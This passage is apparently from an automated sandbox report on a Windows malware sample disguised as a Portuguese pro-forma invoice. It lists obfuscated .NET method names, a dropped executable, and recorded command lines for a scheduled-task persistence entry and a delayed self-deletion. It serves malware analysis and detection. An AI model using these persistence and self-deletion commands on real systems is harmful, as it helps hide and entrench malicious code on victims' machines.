              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, E9LtPwuKpQi6ZoWWhl.csHigh entropy of concatenated method names: 'wfYVi21BK4', 'uWYVsWu3Yg', 'jvRVMKAp96', 'oZjVxNKDhY', 'FAVVrXwCEu', 'yoAVYLJWlX', 'vbCVq3k0aP', 'F1PVGr39aY', 'i5xVTPIPI4', 'DlNVgg2fTg'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, BPtRuoLrWtp4vXFCxG.csHigh entropy of concatenated method names: 'Dispose', 'nZkjhY1GO0', 'EHruy2SgwE', 'uv45mmTDbZ', 'vA9j9EQ7C1', 'xuwjzt5Zyn', 'ProcessDialogKey', 'QU1ucmawwh', 't6XujIX2KD', 'homuutT4ts'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, Q5ojRjNNt049wiCCLRb.csHigh entropy of concatenated method names: 'Cgvv9ZWicw', 'EeAvzDPtNd', 'jr5Rc2TKpq', 'tZ8RjekCQ7', 'l1PRujXYFj', 'BjERXT4aP6', 'rNSRBnDrkT', 'FYjRCOLIjV', 'Yp7R6oD75u', 'wpZRe31uW0'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, oqyhYmNFX41kCRZNwVY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XmJ5EmQLI7', 'YTN5vdGShl', 'MnO5Ry4s4r', 'sCG55Zomaj', 'nyi5w67GGc', 'AY052DtqJS', 'aV95QPHSbB'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, QBD6LeWqfNbDZDo1Gy.csHigh entropy of concatenated method names: 'wiwvKVcg9c', 'xWQvJARZIy', 'pnPvbWDZAr', 'pa1vV9Gt4t', 'IV8vEqYCOk', 'xrJvFS5dai', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, gcGUX2Bedx6QaYS31J.csHigh entropy of concatenated method names: 'DL4XCGrFc2', 'FyrX6GnVT5', 'q2DXe7LTNV', 'WkHXKURASD', 'OXPXJ6OPI2', 'geVXbhn7x3', 'jqiXVZGnum', 'sl1XFbali2', 'SJDXahHKn4', 'Fe2XfGNhEv'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, IYGkQihKqcCcxHNjdZ.csHigh entropy of concatenated method names: 'ToString', 'MyRAUgvlob', 'nNJAyHk491', 'crUALZaJJ9', 'BgaApLO5Ay', 'FOVAn1n3Go', 'KguAN3cXZY', 'YoaAW8hJDe', 'XcpAHNWmY8', 'JGoA3mscTG'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, frWEPPZXcI6c8G7QYF.csHigh entropy of concatenated method names: 'QIMMwSIJX', 'Gg0x1JcmF', 'SlnYPgxAj', 'MkHqWFJf1', 'fSJTB8RFf', 'XBxgPAQsx', 'KVWBhZVwCb97fdle7g', 'lIQ5ij3OjSyYSBkHbu', 'Fqd8gkhdy', 'r5svhZkKt'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, v9ObnkTULXnVyWfjQA.csHigh entropy of concatenated method names: 'JJa4fxXhCk', 'eNo4SgrDmI', 'ToString', 'c6G46TjmZy', 'ceD4eN1UaD', 'zW64KfgV2l', 'AIR4JRH7bd', 'KVN4bDmbGI', 'YKK4V95clx', 'JHM4FteeUN'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, UXkvgCEsWpXnGZrTp9.csHigh entropy of concatenated method names: 'OVvbC6SvZS', 'oDVbeR2v0C', 'EEHbJOxKZI', 'KkabVk1kR4', 'jjAbFMhHx8', 'v3kJmBZxNr', 'fRJJk2i9oZ', 'nyLJIkUOA8', 'Mf7JtCj5TD', 'lN3Jh5AhQI'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, bpHb30nysGa21mKvTL.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n0PuhgmEo8', 'p4cu9e4d37', 'iHuuz3ERNt', 'XksXcH1dxB', 'RpGXjrJeFm', 'of3XuHyykB', 'Ea3XXxB5MF', 'VDggKGYF84Q68AYS8I6'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, zgBjQosOJogGKDUmJH.csHigh entropy of concatenated method names: 'uVjKxFNrQi', 'ThoKYAbV7S', 'xymKGdA9GE', 'XgmKTKU1Y0', 'FWJKln8yxQ', 'soiKAQTKJR', 'GbMK4RiOlT', 'EtMK880qDI', 'lP3KEIEAse', 'FTgKvyCTUE'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, iAdH3LXHdlUDhWWghq.csHigh entropy of concatenated method names: 'lq87GZttOD', 'VLD7T3gOGR', 'XEs7DSvsJ2', 'L9j7ym97aL', 'L0W7pdvPfu', 'I1Z7nT5UZh', 'dGU7WppYMO', 'gPd7HHPQWh', 'RQG703XAma', 'cVl7UYDGtA'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, ncXHr6HjWNrsHiQysJ.csHigh entropy of concatenated method names: 'iTyEDaiqHH', 'pR0Eyq0gTF', 'loGELJLEhc', 'zTLEpAMcbS', 'mJ4En8yYZX', 's95ENtxAm8', 'De9EWKJ921', 'uZ6EH5dk1K', 'LyTE3y9T0s', 'UpAE0Ey6uF'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, TmssbSfd3CWhJyrnTB.csHigh entropy of concatenated method names: 'QOjEl5yDtM', 'TA4E4v4T3r', 'IFgEEQho8E', 'JFDERKnkEX', 'ztYEw3IRV1', 'M2EEQf6hmW', 'Dispose', 'naJ86jBahl', 'h2o8eiXGmK', 'eSQ8KBCL4R'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, sh5n6iRcoyLbwQk1Ge.csHigh entropy of concatenated method names: 'kIIJr098Pi', 'o4WJqN9MCy', 'kjgKL7HdMZ', 'i5PKp0vwdn', 'jg0KnuZPgQ', 'zS9KNVrn4M', 'FoFKWqvnf0', 'kGPKHUJGhb', 'IAAK3Y2mAc', 'h1uK0XDoAx'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, R8pj7n9eaeWMWbYccx.csHigh entropy of concatenated method names: 'c1n4tp5xxn', 'jMW49ByLhn', 'Yws8csqOsA', 'T2e8jxBoea', 'sMI4UaprmD', 'BNQ4PZ5XoP', 'daS4ZMVt9J', 'HT04dvn7jO', 'Gpc4oncKRk', 'AtM41BSCq6'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, fChceiCHC87KuGpc8k.csHigh entropy of concatenated method names: 'FWcbQAdiDw', 'I4gbibEHV5', 'AKybMG6PDU', 'SRebxhnBte', 'IcgbYX2FcR', 'XEkbqjn0Jd', 'SmlbTAw23U', 'RV3bgl9Xlf', 'x1jfkVNDTFYBMLhCQPh', 'a39g0rNmD926so1NT3r'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, qnqHVqNKvdgemhNcIJx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HAZvUZlXT7', 'TE8vP593lF', 'giTvZrSafo', 'tC6vdKyndM', 'EbEvoffrtF', 'nQOv1NLlhc', 'cn0vOgh5Mr'
              Source: 0.2.PROFORMA + PENDENTES.exe.39a2ad0.2.raw.unpack, uKGLrW3QqA3lP5biGX.csHigh entropy of concatenated method names: 'cvsedJodIT', 'VadeoPF5B4', 'O5Be1yL9a3', 'ukOeO5duR8', 'fVCemFDjPS', 'U7pekviT5c', 'iQaeIa4jVQ', 'px0et6QQ7E', 'iDFehiDlNC', 'KG6e9pehHD'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, P9YhaUQTPWGmrkJYOM.csHigh entropy of concatenated method names: 'XIVp6ONf92cjxwcseuR', 'qoC1rfNeGjdpd8pKvlj', 'PGxaLkNxItsr69fUPsO', 'hD6b84ho97', 'NqDbE8YaP5', 'jAFbvfIW7F', 'YQSaXbNbxSDTfYZ4m4w', 'Qm8np7NyHuBI2beEffw'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, X8UiX2cvtnoE290aLy.csHigh entropy of concatenated method names: 'RHyl0mtZMt', 'zgFlP4G9OF', 'jQXldykwxZ', 'CMMloiqeV6', 'eHHlyMSkho', 'rRglLpIJvC', 'M2Qlpk5R6V', 'gj2ln5646D', 'uOplN2Y6Xn', 'imWlWgDR5k'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, OPHIWV1rONTdneeeKQ.csHigh entropy of concatenated method names: 'EuGV6Er0jb', 'REaVKLtjUw', 'jHxVbh2hT2', 'cYNb9QXQda', 'XLlbzbIToe', 'PlsVcGB1hk', 'oV5VjIaSbm', 'a6UVu7G666', 'qupVXrICXs', 'd1nVB4f1LA'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, LhTHsGF4RMAZGCa8kn.csHigh entropy of concatenated method names: 'FQnjVoQgwf', 'ltxjFCoTG0', 'H7yjfXKfBO', 'WaRjSZLE8e', 'K0DjldFJwK', 'C6fjA7va4P', 'VvV8Rud3PZC59uom7a', 'VPd6f1cXlKyQQJTTwa', 'KttjjPFT0d', 'vlYjXT8kOD'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, E9LtPwuKpQi6ZoWWhl.csHigh entropy of concatenated method names: 'wfYVi21BK4', 'uWYVsWu3Yg', 'jvRVMKAp96', 'oZjVxNKDhY', 'FAVVrXwCEu', 'yoAVYLJWlX', 'vbCVq3k0aP', 'F1PVGr39aY', 'i5xVTPIPI4', 'DlNVgg2fTg'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, BPtRuoLrWtp4vXFCxG.csHigh entropy of concatenated method names: 'Dispose', 'nZkjhY1GO0', 'EHruy2SgwE', 'uv45mmTDbZ', 'vA9j9EQ7C1', 'xuwjzt5Zyn', 'ProcessDialogKey', 'QU1ucmawwh', 't6XujIX2KD', 'homuutT4ts'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, Q5ojRjNNt049wiCCLRb.csHigh entropy of concatenated method names: 'Cgvv9ZWicw', 'EeAvzDPtNd', 'jr5Rc2TKpq', 'tZ8RjekCQ7', 'l1PRujXYFj', 'BjERXT4aP6', 'rNSRBnDrkT', 'FYjRCOLIjV', 'Yp7R6oD75u', 'wpZRe31uW0'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, oqyhYmNFX41kCRZNwVY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XmJ5EmQLI7', 'YTN5vdGShl', 'MnO5Ry4s4r', 'sCG55Zomaj', 'nyi5w67GGc', 'AY052DtqJS', 'aV95QPHSbB'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, QBD6LeWqfNbDZDo1Gy.csHigh entropy of concatenated method names: 'wiwvKVcg9c', 'xWQvJARZIy', 'pnPvbWDZAr', 'pa1vV9Gt4t', 'IV8vEqYCOk', 'xrJvFS5dai', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, gcGUX2Bedx6QaYS31J.csHigh entropy of concatenated method names: 'DL4XCGrFc2', 'FyrX6GnVT5', 'q2DXe7LTNV', 'WkHXKURASD', 'OXPXJ6OPI2', 'geVXbhn7x3', 'jqiXVZGnum', 'sl1XFbali2', 'SJDXahHKn4', 'Fe2XfGNhEv'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, IYGkQihKqcCcxHNjdZ.csHigh entropy of concatenated method names: 'ToString', 'MyRAUgvlob', 'nNJAyHk491', 'crUALZaJJ9', 'BgaApLO5Ay', 'FOVAn1n3Go', 'KguAN3cXZY', 'YoaAW8hJDe', 'XcpAHNWmY8', 'JGoA3mscTG'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, frWEPPZXcI6c8G7QYF.csHigh entropy of concatenated method names: 'QIMMwSIJX', 'Gg0x1JcmF', 'SlnYPgxAj', 'MkHqWFJf1', 'fSJTB8RFf', 'XBxgPAQsx', 'KVWBhZVwCb97fdle7g', 'lIQ5ij3OjSyYSBkHbu', 'Fqd8gkhdy', 'r5svhZkKt'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, v9ObnkTULXnVyWfjQA.csHigh entropy of concatenated method names: 'JJa4fxXhCk', 'eNo4SgrDmI', 'ToString', 'c6G46TjmZy', 'ceD4eN1UaD', 'zW64KfgV2l', 'AIR4JRH7bd', 'KVN4bDmbGI', 'YKK4V95clx', 'JHM4FteeUN'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, UXkvgCEsWpXnGZrTp9.csHigh entropy of concatenated method names: 'OVvbC6SvZS', 'oDVbeR2v0C', 'EEHbJOxKZI', 'KkabVk1kR4', 'jjAbFMhHx8', 'v3kJmBZxNr', 'fRJJk2i9oZ', 'nyLJIkUOA8', 'Mf7JtCj5TD', 'lN3Jh5AhQI'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, bpHb30nysGa21mKvTL.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'n0PuhgmEo8', 'p4cu9e4d37', 'iHuuz3ERNt', 'XksXcH1dxB', 'RpGXjrJeFm', 'of3XuHyykB', 'Ea3XXxB5MF', 'VDggKGYF84Q68AYS8I6'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, zgBjQosOJogGKDUmJH.csHigh entropy of concatenated method names: 'uVjKxFNrQi', 'ThoKYAbV7S', 'xymKGdA9GE', 'XgmKTKU1Y0', 'FWJKln8yxQ', 'soiKAQTKJR', 'GbMK4RiOlT', 'EtMK880qDI', 'lP3KEIEAse', 'FTgKvyCTUE'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, iAdH3LXHdlUDhWWghq.csHigh entropy of concatenated method names: 'lq87GZttOD', 'VLD7T3gOGR', 'XEs7DSvsJ2', 'L9j7ym97aL', 'L0W7pdvPfu', 'I1Z7nT5UZh', 'dGU7WppYMO', 'gPd7HHPQWh', 'RQG703XAma', 'cVl7UYDGtA'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, ncXHr6HjWNrsHiQysJ.csHigh entropy of concatenated method names: 'iTyEDaiqHH', 'pR0Eyq0gTF', 'loGELJLEhc', 'zTLEpAMcbS', 'mJ4En8yYZX', 's95ENtxAm8', 'De9EWKJ921', 'uZ6EH5dk1K', 'LyTE3y9T0s', 'UpAE0Ey6uF'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, TmssbSfd3CWhJyrnTB.csHigh entropy of concatenated method names: 'QOjEl5yDtM', 'TA4E4v4T3r', 'IFgEEQho8E', 'JFDERKnkEX', 'ztYEw3IRV1', 'M2EEQf6hmW', 'Dispose', 'naJ86jBahl', 'h2o8eiXGmK', 'eSQ8KBCL4R'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, sh5n6iRcoyLbwQk1Ge.csHigh entropy of concatenated method names: 'kIIJr098Pi', 'o4WJqN9MCy', 'kjgKL7HdMZ', 'i5PKp0vwdn', 'jg0KnuZPgQ', 'zS9KNVrn4M', 'FoFKWqvnf0', 'kGPKHUJGhb', 'IAAK3Y2mAc', 'h1uK0XDoAx'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, R8pj7n9eaeWMWbYccx.csHigh entropy of concatenated method names: 'c1n4tp5xxn', 'jMW49ByLhn', 'Yws8csqOsA', 'T2e8jxBoea', 'sMI4UaprmD', 'BNQ4PZ5XoP', 'daS4ZMVt9J', 'HT04dvn7jO', 'Gpc4oncKRk', 'AtM41BSCq6'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, fChceiCHC87KuGpc8k.csHigh entropy of concatenated method names: 'FWcbQAdiDw', 'I4gbibEHV5', 'AKybMG6PDU', 'SRebxhnBte', 'IcgbYX2FcR', 'XEkbqjn0Jd', 'SmlbTAw23U', 'RV3bgl9Xlf', 'x1jfkVNDTFYBMLhCQPh', 'a39g0rNmD926so1NT3r'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, qnqHVqNKvdgemhNcIJx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HAZvUZlXT7', 'TE8vP593lF', 'giTvZrSafo', 'tC6vdKyndM', 'EbEvoffrtF', 'nQOv1NLlhc', 'cn0vOgh5Mr'
              Source: 0.2.PROFORMA + PENDENTES.exe.70c0000.5.raw.unpack, uKGLrW3QqA3lP5biGX.csHigh entropy of concatenated method names: 'cvsedJodIT', 'VadeoPF5B4', 'O5Be1yL9a3', 'ukOeO5duR8', 'fVCemFDjPS', 'U7pekviT5c', 'iQaeIa4jVQ', 'px0et6QQ7E', 'iDFehiDlNC', 'KG6e9pehHD'
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeFile created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess created: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"Jump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
